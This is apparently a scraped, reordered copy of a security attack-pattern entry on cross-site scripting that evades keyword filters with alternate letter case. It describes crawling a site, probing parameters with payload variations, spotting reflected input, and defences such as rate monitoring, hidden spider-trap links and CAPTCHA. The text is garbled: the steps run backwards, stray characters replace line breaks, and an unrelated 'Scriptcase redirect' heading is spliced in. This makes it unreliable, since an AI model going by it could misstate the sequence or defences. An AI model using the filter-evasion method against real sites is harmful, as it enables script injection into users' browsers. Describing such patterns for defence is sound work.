
Monitor input to web servers, application servers, and other HTTP infrastructure (e.g., load balancers). Some sensitive characters are consistently encoded, but others are not For example, in a HTML tag element, the payload may not be able to evade the quotes in order to inject another attribute. Note that sometimes, the payload might be well encoded in the page, but wouldn't be encoded at all in some other section of the same web page (title, etc.)Īll context-sensitive characters are consistently re-encoded before being sent to the web browser. The attacker's script string is being reflected verbatim at some point in the web site (if not on the same page). The unique identifier from the probe helps to trace the flow of the possible XSS. The payload may be a stored to be served later. User-controllable input is output back to the browser E.g., ?error="File not Found" becomes "File not Found" in the title of the web page The output of pages includes some form of a URL parameter.
#Scriptcase redirect to website based on credentials manual#
Use a proxy tool to record results of manual input of XSS probes in known URLs. Attempt numerous variations based on form, format, syntax & encoding. If possible, the probe strings contain a unique identifier. Use a list of XSS probe strings to inject in parameters of known URLs. He records all the responses from the server that include unmodified versions of his script. The payloads are designed to bypass incomplete filtering (e.g., incomplete HTML encoding etc.) and tries many variations of characters injection that would enable the XSS payload. He sends parameters that include variations of payloads. Possibly using an automated tool, an attacker requests variations on the inputs he surveyed before. Use CAPTCHA to prevent the use of the application by an automated tool.Īctively monitor the application and either deny or redirect requests from origins that appear to be automated.Īttempt injection payload variations on input parameters A request for the page, then, becomes a good predictor of an automated tool probing the application. Using iframes, images, or other HTML techniques, the links can be hidden from web browsing humans, but visible to spiders and programs. 0.8 seconds between them).Ĭreate links on some pages that are visually hidden from web browsers. Tools make requests very quickly and the requests are typically spaced apart regularly (e.g. Humans who view a page and select a link from it will click far slower and far less regularly than tools. Monitor velocity of page fetching in web logs.

Even though none appear, the web application may still use them if they are provided.Īpplications that have only static pages or that simply present information without accepting input are unlikely to be susceptible.Ī list of URLs, with their corresponding parameters is created by the attacker.Ī list of application user interface entry fields is created by the attacker.Ī list of resources accessed by the application is created by the attacker. Using URL rewriting, parameters may be part of the URL path. URL parameters are used by the application or the browser (DOM) Many browser's plugins are available to facilitate the analysis or automate the URL discovery.

Use a browser to manually explore the website and analyze how it is constructed.


Manual traversal of this type is frequently necessary to identify forms that are GET method forms rather than POST forms. Make special note of any links that include parameters in the URL. Use a proxy tool to record all links visited during a manual traversal of the web application. Use a spidering tool to follow and record all links. Using a browser or an automated tool, an attacker follows all public links on a web site. The attack can result in the execution of otherwise prohibited functionality. Other variants using different syntax representations are also possible as well as using pollution meta-characters or entities that are eventually ignored by the rendering engine. For example, the "script" tag using the alternate forms of "Script" or "ScRiPt" may bypass filters where "script" is the only form tested. If the site's web filtering algorithm does not convert all tags into a consistent case before the comparison with forbidden keywords it is possible to bypass filters (e.g., incomplete black lists) by using an alternate case structure. For example, many keywords are processed in a case insensitive manner. The attacker uses alternate forms of keywords or commands that result in the same action as the primary form but which may not be caught by filters.
